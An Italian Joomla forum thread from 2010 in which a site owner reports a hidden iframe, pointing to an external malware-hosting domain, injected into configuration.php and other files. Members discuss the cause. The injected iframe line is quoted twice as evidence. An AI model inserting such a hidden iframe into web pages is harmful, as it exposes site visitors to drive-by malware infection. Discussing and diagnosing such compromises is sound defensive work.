Joomla.it Forum

Joomla! 1.5.x (versione con supporto terminato) => Joomla! 1.5 => : ryche74 07 Mar 2010, 21:04:16

: Problema di sicurezza sulla 1.5.15
: ryche74 07 Mar 2010, 21:04:16

Il seguente messaggio  scritto sul fle configuration

<iframe src="http://www.maas.cl/images/index.php" style="display:none"></iframe>

rende il sito inaccessibile

col seguente messaggio:

Attenzione: l'apertura di questo sito potrebbe danneggiare il tuo computer!
The website at www.xxxxxxxxx.com contains elements from the site www.maas.cl, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
Per maggiori informazioni sui problemi riscontrati per questi elementi, visita la pagina Pagina di diagnostica Navigazione sicura. di www.maas.cl.
Scopri come proteggere il tuo computer dai software dannosi presenti sulla Rete.

: Re:Problema di sicurezza sulla 1.5.15
: lucabensi 07 Mar 2010, 22:39:59

Ciao.
Non ho capito dove hai inserito quel codice (forse in un articolo?).
In ogni caso, il problema non è determinato da Joomla, ma dal fatto che maas.cl è nella lista stilata da Google dei siti infettati da malware: per verificarlo prova ad accedervi direttamente usando firefox con i filtri di Google attivati (lo sono di default).
Che browser ti manifesta l'errore?
Il messaggio ti segnala che il sito contiene qualcosa proveniente da un sito infetto, e quindi rischi di essere infettato da quel qualcosa.
Luca

: Re:Problema di sicurezza sulla 1.5.15
: ryche74 07 Mar 2010, 22:45:34

Ciao.
Il codice 
<iframe src="http://www.maas.cl/images/index.php" style="display:none"></iframe>
l'ho trovato nel fiel configuration.php e appena rimosso  il sito è tornato ok

Il messaggio  "Attenzione: l'apertura di questo sito potrebbe danneggiare il tuo computer!"   etc. etc.
lo trovo non appena tento di entrare nel sito.
Con Firefox non si manifesta
Con Chrome e Safari sì. Explorer non ho ancora provato ma perchè uso MAC.


ps: cosa intendi quando dici  "dove hai inserito quel codice (forse in un articolo?)." !?!?!

: Re:Problema di sicurezza sulla 1.5.15
: ostyle17 07 Mar 2010, 22:47:18

Per quanto ne so io, nel file configuration.php non dovrebbero essere presenti iframe.

: Re:Problema di sicurezza sulla 1.5.15
: mau_develop 07 Mar 2010, 22:47:56

mi dici anche che extensions hai installato?

M.

ps: c'è una sez sicurezza e con un post uguale al tuo

: Re:Problema di sicurezza sulla 1.5.15
: ryche74 07 Mar 2010, 22:54:28

Già ma la riga di codice sul file configuration era lì... :)

e in certi siti anche sull'index.php   della root

L'extension installata era  RAF CLOUD  e ho trovato la stessa riga di codice "i frame" sul file  runlog.php

Una cosa mai vista....  :)

: Re:Problema di sicurezza sulla 1.5.15
: mau_develop 07 Mar 2010, 23:00:21

solo quella?

altre cose oltre al joomla base?... galleria?

M.

: Re:Problema di sicurezza sulla 1.5.15
: lucabensi 07 Mar 2010, 23:01:19

: ryche74  07 Mar 2010, 22:45:34

ps: cosa intendi quando dici  "dove hai inserito quel codice (forse in un articolo?)." !?!?!

Parlavo di articoli perché mi sembrava strano trovarlo nel configuration.php, dove non dovrebbe proprio essere.
Sembra quasi un attacco... ???
Luca

: Re:Problema di sicurezza sulla 1.5.15
: ryche74 07 Mar 2010, 23:04:37

Ho fatto uno screen shot del file configuration

http://img85.imageshack.us/i/configuration.png/

Un attacco???  E come scusa?   Server aggiornatissimo. Joomla aggiornato. Extension aggiornate. Permessi sulle cartelle rigorosamente controllati a 755 e configuaration a  644. Password ftp alfanumeriche lunghissime   :)

Dovrei averlo fatto io  :)

: Re:Problema di sicurezza sulla 1.5.15
: Duilio76 08 Mar 2010, 00:33:35

Un iframe nel configuration.php? Andiamo bene!

: Re:Problema di sicurezza sulla 1.5.15
: ryche74 08 Mar 2010, 18:09:10

Scusate, avete news e/o avete indagato sul problema?